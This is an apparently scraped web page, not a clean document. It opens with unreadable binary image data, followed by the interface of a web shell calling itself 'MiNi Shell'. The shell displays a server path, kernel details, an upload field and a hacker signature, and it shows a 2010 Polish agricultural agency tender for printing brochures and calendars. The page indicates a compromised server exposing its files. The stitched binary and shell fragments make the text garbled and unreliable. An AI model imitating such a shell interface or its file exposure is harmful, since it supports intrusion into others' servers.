JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/55817-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie i dystrybucja wydawnictw zaplanowanych przez ARR na 2010 rok.</b><br>
<b>Numer ogłoszenia: 55817 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 022 6617347, faks 022 6617535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dystrybucja wydawnictw zaplanowanych przez ARR na 2010 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonanie i dystrybucja wydawnictw zaplanowanych przez ARR na 2010 rok:
a) Wydrukowanie:
- każdej z zaplanowanych 27 broszur, 
- 50 egzemplarzy okładki,
- jednego kalendarza plakatowego.
b) Oprawę w wydrukowane okładki 50 egzemplarzy sprawozdania dostarczonego przez Zamawiającego. 
c) Dostarczenie do Centrali Zamawiającego każdej z 27 broszur, 50 egzemplarzy sprawozdania rocznego oprawionego w wydrukowane okładki oraz jednego kalendarza plakatowego.
d) Dostarczenie do 16 oddziałów terenowych Zamawiającego każdej z trzech z ww. 27 broszur (w nakładzie 30 000 i 2 x 50 000 egzemplarzy) według rozdzielnika zawartego w załączniku nr 2, 3, 5 do umowy oraz kalendarza plakatowego (w nakładzie 30 000 egzemplarzy) według rozdzielnika zawartego w załączniku nr 4 do umowy.
2. Wydrukowanie, prace introligatorskie i dostarczenie - każdej z 27 broszur, 50 egzemplarzy sprawozdań oprawionych w wydrukowane okładki oraz jednego kalendarza plakatowego - do Centrali Zamawiającego w terminie nie dłuższym niż 15 dni od daty każdorazowego protokolarnego skierowania do druku danej broszury, kalendarza plakatowego i okładki do sprawozdania (z zastrzeżeniem, że w przypadku kalendarza plakatowego wymienionego w załączniku nr 4 do umowy oraz broszur wymienionych w załączniku nr 2, 3, 5 do umowy termin ten ulega wydłużeniu do nie więcej niż 21 dni, a także z zastrzeżeniem, że jeśli koniec terminu 15 lub 21 dni przypada w sobotę lub dzień uznany ustawowo za wolny od pracy, to termin ten upływa pierwszego dnia roboczego następującego po ww. dniu). Skierowane do druku 27 broszur, jeden kalendarz plakatowy i jedna okładka do oprawy sprawozdania muszą posiadać następujące parametry:
a) 18 broszur w formacie A5 (148 mm x 210 mm)
- liczba stron: 2 strony w nakładzie: 2000 egzemplarzy; 6 stron w nakładzie: 10 000 egzemplarzy, 15 000 egzemplarzy; 8 stron w nakładzie: 2000 egzemplarzy, 10 000 egzemplarzy, 30 000 egzemplarzy+dystr. do 16 OT ARR, 50 000 egzemplarzy+dystr. do 16 OT ARR; 12 stron w nakładzie: 2000 egzemplarzy, 10 000 egzemplarzy; 16 stron w nakładzie: 1500 egzemplarzy; 20 stron w nakładzie: 1500 egzemplarzy, 2000 egzemplarzy, 3000 egzemplarzy; 24 strony w nakładzie: 2000 egzemplarzy; 32 strony w nakładzie: 2000 egzemplarzy; 40 stron w nakładzie: 2000 egzemplarzy, 3000 egzemplarzy; 64 + 4 str. okładki w nakładzie: 3000 egzemplarzy
- papier: kreda mat 150 g - w broszurach o objętości do 40 str.; offset 80 g - w środku broszury o objętości 64 str.; kreda 250 g - okładka broszury o objętości 64 str.
- druk: 5+4+lakier zabezpieczający w broszurach o objętości: 2, 6, 8, 12, 16, 20, 24, 32, 40 stron (5+4 oznacza, że pierwsza i ostatnia strona okładki jest drukowana w 5 kolorach oraz pokryta lakierem zabezpieczającym, zaś reszta stron jest drukowana w 4 kolorach); 1+1 w środku broszury o objętości 64 str.; 5+4+lakier UV na zewnątrz - okładka w broszurze o objętości 64 str.
- introligatornia: oprawa zeszytowa - 2 zszywki (oprócz broszury zawierającej 6 stron - jest to luźna ulotka dwukrotnie falcowana do formatu A5 i złożona do środka).
b) 5 broszur w formacie B5 (164 mm x 235 mm)
- liczba stron: 8 stron + 4 str. okładki w nakładzie: 20 000 egzemplarzy; 24 strony + 4 str. okładki w nakładzie: 3000 egzemplarzy; 24 strony + 4 str. okł. w nakładzie: 50 000 egzemplarzy+dystr. do 16 OT ARR; 112 stron + 4 str. okł. w nakładzie: 1000 egzemplarzy; 128 stron + 4 str. okł. w nakładzie: 2000 egzemplarzy;
- papier: okładka - karton 200 g z białym spodem; środek - offset 90 g w broszurach zawierających 8 i 24 str. + 4 str. okładki; środek - offset 80 g w broszurach zawierających 112 i 128 stron + 4 str. okładki.
- druk: okładka - 5+4+lakier zabezpieczający na zewnątrz w broszurach o objętości 8 i 24 str. + 4 str. okł. oraz 5+4+folia mat na całość okładki + lakier UV punktowo  w broszurze o objętości 112 str.+4 str. okładki, a także 5+0+lakier zabezpieczający na zewnątrz w broszurze  o objętości 128 str.+4 str. okładki; środek -   4+4.
- introligatornia: oprawa zeszytowa (2 zszywki) w broszurach o objętości 8 i 24 stron + 4 str. okładki, oprawa klejona w broszurach o objętości 112 i 128 stron + 4 str. okładki.
c) 1 broszura (393 mm x 209 mm) składana do formatu koperty amerykańskiej 
- liczba stron: 2 strony;
- nakład: 500 egzemplarzy;
- papier: kreda mat 150 g;
- druk:  5+5+lakier zabezpieczający;
- introligatornia: falcowanie potrójne, składana do środka do formatu koperty amerykańskiej.
d) 3 broszury w formacie A4 (210 mm x 297 mm)
- liczba stron:  4+4 strony okładki w nakładzie: 2000 egzemplarzy; 24+4 strony okładki w nakładzie: 1000 egzemplarzy; 24+4 strony okładki w nakładzie: 2000 egzemplarzy;
- papier: okładka - kreda mat 280 g; środek - kreda 150 g;
- druk: okładka - 5+5+folia mat na całość okładki + lakier UV punktowo; środek - 5+5+lakier zabezpieczający.
- introligatornia: oprawa zeszytowa (2 zszywki)
e) 1 okładka w formacie A3+ (322 mm x 445 mm) składana do A4 z grzbietem do oprawy klejonej 
- nakład: 50 egzemplarzy;
- papier: kreda 300 g;
- druk: 4+0+folia błysk;
- introligatornia: oprawa klejona (wnętrze dostarczone przez Zamawiającego - ok. 200 stron).
f) 1 kalendarz plakatowy w formacie B2 (500 mm x 707 mm)
- nakład: 30 000 egzemplarzy + dystr. do 16 OT ARR;
- papier: kreda matowa 170 g + folia mat + lakier UV punktowo;
- wykończenie: 2 listwy metalowe z zawieszką, po krótszych bokach;
- druk: 5+0;
- pakowanie: rulony po 25 egzemplarzy wydrukowanego kalendarza plakatowego w każdym.
3. Zamawiający zastrzega sobie możliwość zmiany listy dystrybucyjnej oraz realizacji innych rodzajów wydawnictw (m.in. plakatów, afiszy, ulotek), zmiany liczby broszur, kalendarza plakatowego, okładek do oprawy przekazywanych Wykonawcy do wydrukowania oraz zmianę niektórych parametrów broszur, kalendarza plakatowego, okładki do oprawy sprawozdania, m.in. nakładu, liczby stron, formatów, gramatury papieru, liczby kolorów itp., przy czym koszty związane z dystrybucją i wydaniem wszystkich wymienionych w przedmiocie zamówienia wydawnictw lub wydawnictw o uaktualnionych parametrach mogą ulec zmianie (wzrost lub spadek) w stosunku do kosztów wyszczególnionych w kalkulacji stanowiącej załącznik nr 1 do umowy. Do wyżej wymienionych zmian stawki określone w kalkulacji stanowiącej załącznik nr 1 do umowy stosuje się odpowiednio. Powyższe zmiany nie spowodują przekroczenia wartości umowy. Dokonanie powyższych zmian nastąpi za porozumieniem stron w formie pisemnej pod rygorem nieważności. 
4. Termin wykonania przedmiotu zamówienia: od podpisania umowy do 20.12.2010 r.
5. Pozostałe informacje dotyczące przedmiotu zamówienia opisane są w Istotnych Postanowieniach Umowy, które stanowią załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od każdego wykonawcy wniesienia przed upływem terminu składania ofert wadium w wysokości 6.000 zł (słownie: sześć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje przynajmniej jedną usługę tożsamą z przedmiotem zamówienia o łącznej wartości, co najmniej 150 000 zł brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość zmiany listy dystrybucyjnej oraz realizacji innych rodzajów wydawnictw (m.in. plakatów, afiszy, ulotek), zmiany liczby broszur, kalendarza plakatowego, okładek do oprawy przekazywanych Wykonawcy do wydrukowania oraz zmianę niektórych parametrów broszur, kalendarza plakatowego, okładki do oprawy sprawozdania, m.in. nakładu, liczby stron, formatów, gramatury papieru, liczby kolorów itp., przy czym koszty związane z dystrybucją i wydaniem wszystkich wymienionych w przedmiocie zamówienia wydawnictw lub wydawnictw o uaktualnionych parametrach mogą ulec zmianie (wzrost lub spadek) w stosunku do kosztów wyszczególnionych w kalkulacji stanowiącej załącznik nr 1 do umowy. Do wyżej wymienionych zmian stawki określone w kalkulacji stanowiącej załącznik nr 1 do umowy stosuje się odpowiednio. Powyższe zmiany nie spowodują przekroczenia wartości umowy. Dokonanie powyższych zmian nastąpi za porozumieniem stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rynku Rolnego, ul. Nowy Świat 6/12, 00 - 400 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2010 godzina 10:00, miejsce: W siedzibie Agencji Rynku Rolnego w Warszawie, przy ul. Nowy Świat 6/12, w Kancelarii Ogólnej, hol główny, parter, wejście D/A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com